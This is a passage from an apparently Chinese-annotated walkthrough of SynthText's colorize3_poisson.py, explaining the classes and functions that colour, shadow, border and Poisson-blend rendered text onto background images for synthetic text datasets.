    # 调用 TextRegions.filter_depth 函数,以点云数据 xyz、分割结果 seg 和文本区域信息 regions 为输入,对每个区域进行深度滤波,获取满足条件的平面信息,更新存储平面信息的 regions 变量
    regions = TextRegions.filter_depth(xyz,seg,regions)
    # 函数返回经过深度滤波后的文本区域信息 regions
    return regions

    colorize3_poisson.py

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import cv2 as cv
    import numpy as np
    import matplotlib.pyplot as plt
    import scipy.interpolate as si
    import scipy.ndimage as scim
    import scipy.ndimage.interpolation as sii
    import os
    import os.path as osp
    #import cPickle as cp
    import _pickle as cp
    #import Image
    from PIL import Image
    from poisson_reconstruct import blit_images
    import pickle

    sample_weighted()

    1
    2
    3
    4
    5
    6
    def sample_weighted(p_dict):
    """
    接收一个字典 p_dict,用于表示概率分布,其中键表示某个值,值表示对应的概率。函数首先获取概率分布中的键,并使用 np.random.choice 函数根据概率分布进行随机采样,返回所选的键
    """
    ps = p_dict.keys()
    return ps[np.random.choice(len(ps),p=p_dict.values())]

    class Layer()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    class Layer(object):

    def __init__(self,alpha,color):

    # alpha for the whole image:
    # 针对 alpha 参数,函数要求其维度为 2(二维矩阵)。然后获取 alpha 的形状,并保存在变量 [n, m] 中
    assert alpha.ndim==2
    self.alpha = alpha
    [n,m] = alpha.shape[:2]
    # 针对 color 参数,函数将其转换为 uint8 类型的数组。
    color=np.atleast_1d(np.array(color)).astype('uint8')
    # color for the image:
    # 根据 color 的长度决定是灰度图还是彩色图,然后创建相应维度的颜色矩阵
    # 如果 color 维度为 1,则表示整个图层都是固定颜色
    if color.ndim==1: # constant color for whole layer
    ncol = color.size
    if ncol == 1 : #grayscale layer
    self.color = color * np.ones((n,m,3),'uint8')
    if ncol == 3 :
    self.color = np.ones((n,m,3),'uint8') * color[None,None,:]
    # 如果 color 维度为 2,表示是灰度图,将其转换为三通道的颜色矩阵
    elif color.ndim==2: # grayscale image
    self.color = np.repeat(color[:,:,None],repeats=3,axis=2).copy().astype('uint8')
    # 如果 color 维度为 3,表示是彩色图,直接保存为颜色矩阵
    elif color.ndim==3: #rgb image
    self.color = color.copy().astype('uint8')
    # 如果以上情况都不满足,则抛出异常
    else:
    print (color.shape)
    raise excerption("color datatype not understood")

    class FontColor()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    class FontColor(object):

    def __init__(self, col_file):
    """
    这是一个构造函数,用于创建 FontColor 对象并初始化对象的属性
    """
    with open(col_file,'rb') as f:
    """
    使用 open() 函数打开名为 col_file 的文件,并将其指定为二进制模式读取('rb')
    """
    #self.colorsRGB = cp.load(f)
    # 创建一个 _Unpickler 对象 u,用于反序列化从文件中读取的数据
    u = pickle._Unpickler(f)
    # 设置 Unpickler 的编码方式为 'latin1',以确保正确解析文件中的数据
    u.encoding = 'latin1'
    # 调用 Unpickler 对象的 load() 方法,从文件中加载数据并将其存储在变量 p 中
    p = u.load()
    # 将加载的数据赋值给对象的属性 colorsRGB,该属性存储颜色数据
    self.colorsRGB = p
    # 计算颜色数据的行数,并将结果存储在对象的属性 ncol 中
    self.ncol = self.colorsRGB.shape[0]

    # convert color-means from RGB to LAB for better nearest neighbour
    # computations:
    # 从颜色数据中提取 RGB 通道的数据,并将其转换为 LAB 颜色空间
    self.colorsLAB = np.r_[self.colorsRGB[:,0:3], self.colorsRGB[:,6:9]].astype('uint8')
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 颜色数据转换为 LAB 颜色空间,并调整维度以去除多余的维度
    self.colorsLAB = np.squeeze(cv.cvtColor(self.colorsLAB[None,:,:],cv.COLOR_RGB2Lab))


    def sample_normal(self, col_mean, col_std):
    """
    sample from a normal distribution centered around COL_MEAN
    with standard deviation = COL_STD.
    这是一个用于从正态分布中采样颜色的方法。它接受两个参数,col_mean 和 col_std,分别表示正态分布的均值和标准差
    """
    # 使用 np.random.randn() 函数从标准正态分布中生成一个随机数,并乘以 col_std,再加上 col_mean,得到采样的颜色
    col_sample = col_mean + col_std * np.random.randn()
    # 使用 np.clip() 函数将采样的颜色限制在 0 到 255 之间,然后使用 astype() 函数将其转换为整数类型 (uint8) 并返回
    return np.clip(col_sample, 0, 255).astype('uint8')

    def sample_from_data(self, bg_mat):
    """
    bg_mat : this is a nxmx3 RGB image. 一个从数据集中采样颜色的方法。它接受一个参数bg_mat,表示一个RGB图像。

    returns a tuple : (RGB_foreground, RGB_background)
    each of these is a 3-vector.
    """
    # 复制输入的背景图像,以备后续使用
    bg_orig = bg_mat.copy()
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 图像转换为 LAB 颜色空间
    bg_mat = cv.cvtColor(bg_mat, cv.COLOR_RGB2Lab)
    # 将背景颜色矩阵重塑为一个二维数组,每一行代表一个像素点的颜色
    bg_mat = np.reshape(bg_mat, (np.prod(bg_mat.shape[:2]),3))
    # 计算背景颜色矩阵的均值,得到一组代表整个背景图像颜色的平均值
    bg_mean = np.mean(bg_mat,axis=0)

    # 计算每个颜色数据与背景颜色之间的欧氏距离,并存储在 norms 数组中
    norms = np.linalg.norm(self.colorsLAB-bg_mean[None,:], axis=1)
    # choose a random color amongst the top 3 closest matches:
    #nn = np.random.choice(np.argsort(norms)[:3])
    # 找到欧氏距离最小的颜色数据的索引,即与背景颜色最相近的颜色数据
    nn = np.argmin(norms)

    # nearest neighbour color:
    # 获取与背景颜色最相近的颜色数据。
    data_col = self.colorsRGB[np.mod(nn,self.ncol),:]

    # 使用 sample_normal 方法从颜色数据的前半部分采样一个颜色作为前景颜色。
    col1 = self.sample_normal(data_col[:3],data_col[3:6])
    # 使用 sample_normal 方法从颜色数据的后半部分采样一个颜色作为背景颜色。
    col2 = self.sample_normal(data_col[6:9],data_col[9:12])

    # 判断最相近的颜色是否来自于数据集中已有的颜色。
    if nn < self.ncol:
    return (col2, col1) # 返回(col2, col1),即背景颜色在前,前景颜色在后。
    else:
    # need to swap to make the second color close to the input backgroun color
    return (col1, col2) # 前景颜色在前,背景颜色在后。

    def mean_color(self, arr):
    """
    将输入图像转换为 HSV 颜色空间,并计算其所有像素点的平均颜色,最后将该颜色值转换回 RGB 空间并返回。
    """
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 图像转换为 HSV 颜色空间。
    col = cv.cvtColor(arr, cv.COLOR_RGB2HSV)
    # 将颜色矩阵重新塑造为一个二维数组,每一行表示一个像素点的颜色。
    col = np.reshape(col, (np.prod(col.shape[:2]),3))
    # 计算颜色矩阵的均值,得到一组代表整个图像颜色的平均值,并将其转换为 8 位无符号整数(uint8)。
    col = np.mean(col,axis=0).astype('uint8')
    # 使用 OpenCV 的 cvtColor() 函数将 HSV 颜色空间中的颜色转换回 RGB 颜色空间,并将颜色数组压缩为一维数组,作为平均颜色的值返回。
    return np.squeeze(cv.cvtColor(col[None,None,:],cv.COLOR_HSV2RGB))

    def invert(self, rgb):
    """
    反色
    """
    rgb = 127 + rgb
    return rgb

    def complement(self, rgb_color):
    """
    返回与给定 RGB 颜色值(rgb_color)互补的颜色
    return a color which is complementary to the RGB_COLOR.
    """
    # 使用 OpenCV 的 cvtColor() 函数将 RGB 颜色值转换为 HSV 颜色空间,并将颜色数组压缩为一维数组
    col_hsv = np.squeeze(cv.cvtColor(rgb_color[None,None,:], cv.COLOR_RGB2HSV))
    # 将HSV颜色值中的色调(Hue)加上128,实现颜色互补的效果。注意,这里的色调值需要进行取模操作,以确保它在0到255的范围内。
    col_hsv[0] = col_hsv[0] + 128 #uint8 mods to 255
    # 使用 OpenCV 的 cvtColor() 函数将修改后的 HSV 值转回 RGB 颜色空间,并将颜色数组压缩为一维数组。
    col_comp = np.squeeze(cv.cvtColor(col_hsv[None,None,:],cv.COLOR_HSV2RGB))
    # 返回互补颜色的 RGB 值
    return col_comp

    def triangle_color(self, col1, col2):
    """
    返回与给定两种 RGB 颜色值(col1和col2)相对应的颜色
    计算相对颜色的方法,它接受两个表示 RGB 颜色值的参数 col1 和 col2
    Returns a color which is "opposite" to both col1 and col2.
    """
    # 将输入的col1和col2转换为NumPy数组。
    col1, col2 = np.array(col1), np.array(col2)
    # 使用 OpenCV 的 cvtColor() 函数将 col1 从 RGB 颜色空间转换为 HSV 颜色空间,并将颜色数组压缩为一维数组。
    col1 = np.squeeze(cv.cvtColor(col1[None,None,:], cv.COLOR_RGB2HSV))
    # col2 也是
    col2 = np.squeeze(cv.cvtColor(col2[None,None,:], cv.COLOR_RGB2HSV))
    # 获取col1和col2的色调值(Hue)。
    h1, h2 = col1[0], col2[0]
    # 如果 h2 小于 h1,则交换它们的值,确保 h1 始终小于等于 h2。
    if h2 < h1 : h1,h2 = h2,h1 #swap
    # 计算 h2 和 h1 之间的差值。
    dh = h2-h1
    # 如果差值 dh 小于 127,则将 dh 设置为 255 减去 dh,实现相对颜色的计算。
    if dh < 127: dh = 255-dh
    # 将 col1 的色调值设置为 h1 加上 dh 的一半,以获得相对颜色的色调值
    col1[0] = h1 + dh/2
    # 使用 OpenCV 的 cvtColor() 函数将修改后的HSV值转回RGB颜色空间,并将颜色数组压缩为一维数组,并返回相对颜色的RGB值
    return np.squeeze(cv.cvtColor(col1[None,None,:],cv.COLOR_HSV2RGB))

    def change_value(self, col_rgb, v_std=50):
    """
    随机改变给定RGB颜色值(col_rgb)的亮度值。
    这是一个改变颜色亮度的方法,它接受一个表示 RGB 颜色值的参数 col_rgb 和一个可选的标准差 v_std
    """
    # 使用 OpenCV 的 cvtColor() 函数将 col_rgb 从 RGB 颜色空间转换为 HSV 颜色空间,并将颜色数组压缩为一维数组。
    col = np.squeeze(cv.cvtColor(col_rgb[None,None,:], cv.COLOR_RGB2HSV))
    # 获取 col 的亮度值(Value)。
    x = col[2]
    # 生成一个从 0 到 1 均匀分布的值数组。
    vs = np.linspace(0,1)
    # 计算每个值与 x / 255.0 的差的绝对值,得到一个代表每个值与 x 的差异程度的数组。
    ps = np.abs(vs - x/255.0)
    # 将数组 ps 归一化,使其总和等于 1
    ps /= np.sum(ps)
    # 从 vs 数组中根据权重 ps 随机选择一个值,并添加一个服从正态分布的小的随机偏移(以标准差 0.1 * v_std 为基础),然后将其限制在 0 到 1 之间。
    v_rand = np.clip(np.random.choice(vs,p=ps) + 0.1*np.random.randn(),0,1)
    # 将 col 的亮度值设置为 255 乘以 v_rand,以获得新的亮度值
    col[2] = 255*v_rand
    return np.squeeze(cv.cvtColor(col[None,None,:],cv.COLOR_HSV2RGB))

    class Colorize()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    376
    377
    378
    379
    380
    381
    382
    383
    384
    385
    386
    387
    388
    389
    390
    391
    392
    393
    394
    395
    396
    397
    398
    399
    400
    class Colorize(object):

    def __init__(self, model_dir='data'):#, im_path):
    # 类的初始化方法,接受一个可选参数 model_dir 作为输入。
    # # get a list of background-images:
    # imlist = [osp.join(im_path,f) for f in os.listdir(im_path)]
    # self.bg_list = [p for p in imlist if osp.isfile(p)]

    # 创建一个 FontColor 对象,并将颜色文件的路径作为参数传递给 FontColor 类的初始化方法。这个颜色文件的路径是通过将 model_dir 和 'models/colors_new.cp' 拼接而成的。
    self.font_color = FontColor(col_file=osp.join(model_dir,'models/colors_new.cp'))

    # probabilities of different text-effects:
    # add bevel effect to text 添加文字凸起效果的概率
    self.p_bevel = 0.05
    # just keep the outline of the text 只保留文字轮廓的概率
    self.p_outline = 0.05
    # 添加文字投影的概率
    self.p_drop_shadow = 0.15
    # 添加文字边框的概率
    self.p_border = 0.15
    # add background-based bump-mapping
    # 基于背景添加文字的凹凸映射效果的概率
    self.p_displacement = 0.30
    # use an image for coloring text 使用图像为文字上色的概率
    self.p_texture = 0.0


    def drop_shadow(self, alpha, theta, shift, size, op=0.80):
    """
    给输入的 alpha 图像添加投影效果,并返回带有投影效果的图像。投影的效果由参数 alpha、theta、shift、size 和 op 来控制。
    alpha : alpha layer whose shadow need to be cast
    theta : [0,2pi] -- the shadow direction
    shift : shift in pixels of the shadow
    size : size of the GaussianBlur filter
    op : opacity of the shadow (multiplying factor)

    @return : alpha of the shadow layer
    (it is assumed that the color is black/white)
    """
    if size%2==0: # 如果 size 是偶数,将其减 1 以确保 size 是奇数
    size -= 1
    size = max(1,size)
    # 使用 OpenCV 的 GaussianBlur 函数对输入的 alpha 图像进行高斯模糊,模糊核的大小为 (size, size),标准差为 0。这样可以产生投影的模糊效果。
    shadow = cv.GaussianBlur(alpha,(size,size),0)
    # 根据投影的角度 theta 和平移距离 shift 计算投影在 x 和 y 方向上的偏移量。
    [dx,dy] = shift * np.array([-np.sin(theta), np.cos(theta)])
    # 使用 scipy 库中的 shift 函数对阴影图像进行平移操作,并乘以一个 opacity 因子 op。平移的偏移量由步骤 5 计算得到。此外,设置了平移模式为 'constant',边界填充值为 0。
    shadow = op*sii.shift(shadow, shift=[dx,dy],mode='constant',cval=0)
    return shadow.astype('uint8')

    def border(self, alpha, size, kernel_type='RECT'):
    """
    alpha : alpha layer of the text
    size : size of the kernel
    kernel_type : one of [rect,ellipse,cross]

    @return : alpha layer of the border (color to be added externally).
    """
    # 定义了 kernel_type 和对应的形态学操作类型。
    kdict = {'RECT':cv.MORPH_RECT, 'ELLIPSE':cv.MORPH_ELLIPSE,
    'CROSS':cv.MORPH_CROSS}
    # 使用 OpenCV 的 getStructuringElement 函数创建指定大小和形状的卷积核,以在 alpha 图像周围创建边框。这里的 kdict[kernel_type] 会返回 rect、ellipse 或 cross 中一个值,而 (size, size) 是指卷积核的大小。
    kernel = cv.getStructuringElement(kdict[kernel_type],(size,size))
    # 使用 OpenCV 的 dilate 函数对输入的 alpha 图像进行膨胀操作,以使边框变得更突出。这里的 iterations=1 表示只进行一次膨胀操作。最后,减去 alpha 层,得到新的 alpha 层。这样,在文本周围会出现黑色的边框。
    border = cv.dilate(alpha,kernel,iterations=1) # - alpha
    return border

    def blend(self,cf,cb,mode='normal'):
    """
    在这个方法中,函数只返回了前景图像。这表明该函数还没有完成或者是开发者忘记编写具体的合成算法。
    """
    return cf

    def merge_two(self,fore,back,blend_type=None):
    """
    merge two FOREground and BACKground layers.
    ref: https://en.wikipedia.org/wiki/Alpha_compositing
    ref: Chapter 7 (pg. 440 and pg. 444):
    http://partners.adobe.com/public/developer/en/pdf/PDFReference.pdf
    """
    # 将前景图层的 alpha 通道值转换为范围在 0 到 1 之间的浮点数,表示不透明度
    a_f = fore.alpha/255.0
    # 将背景图层的 alpha 通道值转换为范围在 0 到 1 之间的浮点数,表示不透明度
    a_b = back.alpha/255.0
    # 获取前景图层的颜色通道值
    c_f = fore.color
    # 获取背景图层的颜色通道值
    c_b = back.color
    # 根据 Alpha 合成公式计算新的合成后的图像的 alpha 值
    a_r = a_f + a_b - a_f*a_b
    if blend_type != None:
    # 使用之前提到的 blend() 方法将前景和背景的颜色进行合成,得到混合后的颜色
    c_blend = self.blend(c_f, c_b, blend_type)
    # 以混合后的颜色为基础,按照 Alpha 合成公式计算新的合成后的图像的颜色值
    c_r = ( ((1-a_f)*a_b)[:,:,None] * c_b
    + ((1-a_b)*a_f)[:,:,None] * c_f
    + (a_f*a_b)[:,:,None] * c_blend )
    else:
    # c_r 的计算只根据前景和背景的颜色以及各自的不透明度进行合成
    c_r = ( ((1-a_f)*a_b)[:,:,None] * c_b
    + a_f[:,:,None]*c_f )
    # 返回一个新的图层对象,其中包含合成后的图像的 alpha 和颜色通道值
    return Layer((255*a_r).astype('uint8'), c_r.astype('uint8'))

    def merge_down(self, layers, blends=None):
    """
    将多个图层逐层合并成单个图层
    layers : [l1,l2,...ln] : a list of LAYER objects.
    l1 is on the top, ln is the bottom-most layer.
    blend : the type of blend to use. Should be n-1.
    use None for plain alpha blending.
    Note : (1) it assumes that all the layers are of the SAME SIZE.
    @return : a single LAYER type object representing the merged-down image
    """
    nlayers = len(layers) # 获取图层数量
    if nlayers > 1: # 检查是否有多个图层需要合并
    [n,m] = layers[0].alpha.shape[:2] # 获取第一个图层的尺寸
    out_layer = layers[-1] # 初始化输出图层为最底层的图层
    # 从倒数第二个图层开始循环遍历,直到最顶层的图层
    for i in range(-2,-nlayers-1,-1):
    blend=None
    if blends is not None:
    blend = blends[i+1]
    out_layer = self.merge_two(fore=layers[i], back=out_layer,blend_type=blend)
    return out_layer
    else:
    return layers[0]

    def resize_im(self, im, osize):
    # 将输入的图像调整为指定的大小
    return np.array(Image.fromarray(im).resize(osize[::-1], Image.BICUBIC))

    def occlude(self):
    """
    somehow add occlusion to text.
    这个方法 occlude() 是一个占位方法,还未实现其具体功能。

    根据注释中的描述,该方法的目的是向文本中添加遮挡效果。然而,在代码中该方法没有任何实现,只有一个空的 pass 语句。这意味着在当前的代码实现中,该方法没有具体的功能。

    如果你希望实现该方法,你可以根据具体需求和设计思路,编写代码来实现添加遮挡效果的逻辑。例如,可以使用图像处理技术在文本区域上添加遮挡元素,或者通过修改文本的视觉特征来模拟遮挡效果。具体的实现方式取决于你的需求和想要实现的效果。
    """
    pass

    def color_border(self, col_text, col_bg):
    """
    用于确定边框的颜色的选择逻辑
    Decide on a color for the border:
    - could be the same as text-color but lower/higher 'VALUE' component. 边框颜色与文本颜色相同,但是 'VALUE' 分量较低或较高
    - could be the same as bg-color but lower/higher 'VALUE'. 边框颜色与背景颜色相同,但是 'VALUE' 分量较低或较高
    - could be 'mid-way' color b/w text & bg colors. 边框颜色为文本颜色和背景颜色之间的中间颜色。
    """
    # 随机选择一个数字,范围是 0 到 2,用于决定使用哪种方式选择边框颜色
    choice = np.random.choice(3)
    # 将输入的文本颜色 col_text 转换为 HSV 格式,以便于处理颜色的亮度等特征
    col_text = cv.cvtColor(col_text, cv.COLOR_RGB2HSV)
    # 将 col_text 变形为一维数组,并计算其均值,得到颜色的平均值
    col_text = np.reshape(col_text, (np.prod(col_text.shape[:2]),3))
    col_text = np.mean(col_text,axis=0).astype('uint8')
    # 通过线性插值,定义了一个从 0 到 1 的值序列,用于生成随机样本
    vs = np.linspace(0,1)
    def get_sample(x):
    """
    通过计算与目标值 x/255.0 的差距,选择一个随机样本,并在其上加入一定的随机扰动。返回取样结果乘以 255,得到一个颜色分量值。
    """
    ps = np.abs(vs - x/255.0)
    ps /= np.sum(ps)
    v_rand = np.clip(np.random.choice(vs,p=ps) + 0.1*np.random.randn(),0,1)
    return 255*v_rand

    # first choose a color, then inc/dec its VALUE:
    # 根据选择的方式进行不同的处理
    if choice==0:
    # increase/decrease saturation:
    # 增加或减少饱和度
    col_text[0] = get_sample(col_text[0]) # saturation
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    elif choice==1:
    # get the complementary color to text:
    # 获取文本颜色的互补色
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    col_text = self.font_color.complement(col_text)
    else:
    # choose a mid-way color:
    # 选择文本颜色和背景颜色的中间颜色
    col_bg = cv.cvtColor(col_bg, cv.COLOR_RGB2HSV)
    col_bg = np.reshape(col_bg, (np.prod(col_bg.shape[:2]),3))
    col_bg = np.mean(col_bg,axis=0).astype('uint8')
    col_bg = np.squeeze(cv.cvtColor(col_bg[None,None,:],cv.COLOR_HSV2RGB))
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))
    col_text = self.font_color.triangle_color(col_text,col_bg)

    # now change the VALUE channel:
    # 将处理后的颜色转换为 HSV 格式,并修改亮度通道的值。
    col_text = np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_RGB2HSV))
    col_text[2] = get_sample(col_text[2]) # value
    # 最后,将处理后的颜色转换为 RGB 格式,并返回结果
    return np.squeeze(cv.cvtColor(col_text[None,None,:],cv.COLOR_HSV2RGB))

    def color_text(self, text_arr, h, bg_arr):
    """
    用于确定文本的颜色。具体而言,该方法采用以下几种方式之一来选择文本的颜色
    Decide on a color for the text:
    - could be some other random image. 从其他随机图像中选择一个颜色作为文本的颜色
    - could be a color based on the background. 根据背景选择一个颜色
    this color is sampled from a dictionary built
    from text-word images' colors. The VALUE channel
    is randomized.
    这个颜色是从建立在文本单词图像颜色上的字典中进行采样的。其中,颜色的亮度通道 (VALUE) 是随机化的

    H : minimum height of a character
    """
    # 定义变量,用于存储背景色和文本颜色
    bg_col,fg_col,i = 0,0,0
    # 从文本单词图像颜色构建的字典中采样一个颜色作为文本颜色,并将结果分别赋值给 fg_col 和 bg_col
    fg_col,bg_col = self.font_color.sample_from_data(bg_arr)
    # 创建一个 Layer 对象,将 text_arr 作为透明度 (alpha) 通道,将 fg_col 作为颜色 (color) 通道,并返回该对象以及 fg_col 和 bg_col
    return Layer(alpha=text_arr, color=fg_col), fg_col, bg_col


    def process(self, text_arr, bg_arr, min_h):
    """
    用于将文本图层 text_arr 融合到背景图像 bg_arr 上
    text_arr : one alpha mask : nxm, uint8
    bg_arr : background image: nxmx3, uint8
    min_h : height of the smallest character (px)

    return text_arr blit onto bg_arr.
    """
    # decide on a color for the text:
    # 调用 color_text 方法确定文本的颜色,并将结果的透明度通道 l_text、文本颜色 fg_col 和背景颜色 bg_col 分别赋值给变量
    l_text, fg_col, bg_col = self.color_text(text_arr, min_h, bg_arr)
    # 根据文本的透明度通道 l_text.alpha 构建一个新的图层 l_bg,其中颜色通道为 bg_col
    bg_col = np.mean(np.mean(bg_arr,axis=0),axis=0)
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'),color=bg_col)
    # 将 l_text 的透明度乘以一个随机化的权重,并将结果限制在 0.72 到 1.0 之间
    l_text.alpha = l_text.alpha * np.clip(0.88 + 0.1*np.random.randn(), 0.72, 1.0)
    layers = [l_text]
    blends = []

    # add border:
    if np.random.rand() < self.p_border:
    # 根据最小高度 min_h 确定边界的大小 bsz
    if min_h <= 15 : bsz = 1
    elif 15 < min_h < 30: bsz = 3
    else: bsz = 5
    border_a = self.border(l_text.alpha, size=bsz)
    # 使用 border 方法创建一个边界图层 l_border,其中边界的透明度为 l_text.alpha,颜色为根据 l_text.color 和 l_bg.color 确定的边界颜色
    l_border = Layer(border_a, self.color_border(l_text.color,l_bg.color))
    # 将 l_border 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_border)
    blends.append('normal')

    # add shadow:
    # 如果随机数小于 p_drop_shadow(可能是一个阴影的概率):
    if np.random.rand() < self.p_drop_shadow:
    # shadow gaussian size:
    # 根据最小高度 min_h 确定阴影的大小 bsz
    if min_h <= 15 : bsz = 1
    elif 15 < min_h < 30: bsz = 3
    else: bsz = 5

    # shadow angle: 随机选择阴影的角度
    theta = np.pi/4 * np.random.choice([1,3,5,7]) + 0.5*np.random.randn()

    # shadow shift: 根据最小高度 min_h 确定阴影的偏移量 shift
    if min_h <= 15 : shift = 2
    elif 15 < min_h < 30: shift = 7+np.random.randn()
    else: shift = 15 + 3*np.random.randn()

    # opacity: 根据最小高度 min_h 确定阴影的不透明度 op
    op = 0.50 + 0.1*np.random.randn()
    # 使用 drop_shadow 方法创建一个阴影图层 l_shadow,其中阴影的透明度为 l_text.alpha,颜色为 0
    shadow = self.drop_shadow(l_text.alpha, theta, shift, 3*bsz, op)
    l_shadow = Layer(shadow, 0)
    # 将 l_shadow 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_shadow)
    blends.append('normal')

    # 创建一个新的图层 l_bg,颜色通道为 bg_arr
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'), color=bg_col)
    # 将 l_bg 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_bg)
    blends.append('normal')
    # 将所有图层融合成一个图层
    l_normal = self.merge_down(layers,blends)
    # now do poisson image editing: 使用泊松图像编辑算法
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'), color=bg_arr)
    l_out = blit_images(l_normal.color,l_bg.color.copy())

    # plt.subplot(1,3,1)
    # plt.imshow(l_normal.color)
    # plt.subplot(1,3,2)
    # plt.imshow(l_bg.color)
    # plt.subplot(1,3,3)
    # plt.imshow(l_out)
    # plt.show()

    # 如果融合后的图像 l_out 为 None,则将最后一个图层 l_bg 替换为 l_bg,并返回最终融合后的图像颜色
    if l_out is None:
    # poisson recontruction produced
    # imperceptible text. In this case,
    # just do a normal blend:
    layers[-1] = l_bg
    return self.merge_down(layers,blends).color

    return l_out


    def check_perceptible(self, txt_mask, bg, txt_bg):
    """
    这是一个被弃用的方法 check_perceptible,它用于检查文本与背景图像合并后是否仍然可见。
    --- DEPRECATED; USE GRADIENT CHECKING IN POISSON-RECONSTRUCT INSTEAD ---

    checks if the text after merging with background
    is still visible.
    txt_mask (hxw) : binary image of text -- 255 where text is present
    0 elsewhere
    bg (hxwx3) : original background image WITHOUT any text.
    txt_bg (hxwx3) : image with text.
    """
    bgo,txto = bg.copy(), txt_bg.copy()
    txt_mask = txt_mask.astype('bool')
    bg = cv.cvtColor(bg.copy(), cv.COLOR_RGB2Lab)
    txt_bg = cv.cvtColor(txt_bg.copy(), cv.COLOR_RGB2Lab)
    bg_px = bg[txt_mask,:]
    txt_px = txt_bg[txt_mask,:]
    bg_px[:,0] *= 100.0/255.0 #rescale - L channel
    txt_px[:,0] *= 100.0/255.0

    diff = np.linalg.norm(bg_px-txt_px,ord=None,axis=1)
    diff = np.percentile(diff,[10,30,50,70,90])
    print ("color diff percentile :", diff)
    return diff, (bgo,txto)

    def color(self, bg_arr, text_arr, hs, place_order=None, pad=20):
    """
    将文本图像着色
    Return colorized text image.

    text_arr : list of (n x m) numpy text alpha mask (unit8).
    hs : list of minimum heights (scalar) of characters in each text-array.
    text_loc : [row,column] : location of text in the canvas.
    canvas_sz : size of canvas image.

    return : nxmx3 rgb colorized text-image.
    """
    # 复制输入的背景图像
    bg_arr = bg_arr.copy()
    # 如果背景图像是灰度图像(二维)或单通道图像(shape[2] == 1),则将其转换为三通道图像
    if bg_arr.ndim == 2 or bg_arr.shape[2]==1: # grayscale image:
    bg_arr = np.repeat(bg_arr[:,:,None], 3, 2)

    # get the canvas size:
    # 获取背景图像的尺寸
    canvas_sz = np.array(bg_arr.shape[:2])

    # initialize the placement order:
    # 初始化放置文本的顺序
    if place_order is None:
    place_order = np.array(range(len(text_arr)))

    rendered = []
    # 对每个文本数组进行处理
    for i in place_order[::-1]:
    # get the "location" of the text in the image:
    # this is the minimum x and y coordinates of text:
    # 获取文本在图像中的位置。
    loc = np.where(text_arr[i])
    # 计算文本区域的最小点和最大点,并计算出文本区域的宽度和高度
    lx, ly = np.min(loc[0]), np.min(loc[1])
    mx, my = np.max(loc[0]), np.max(loc[1])
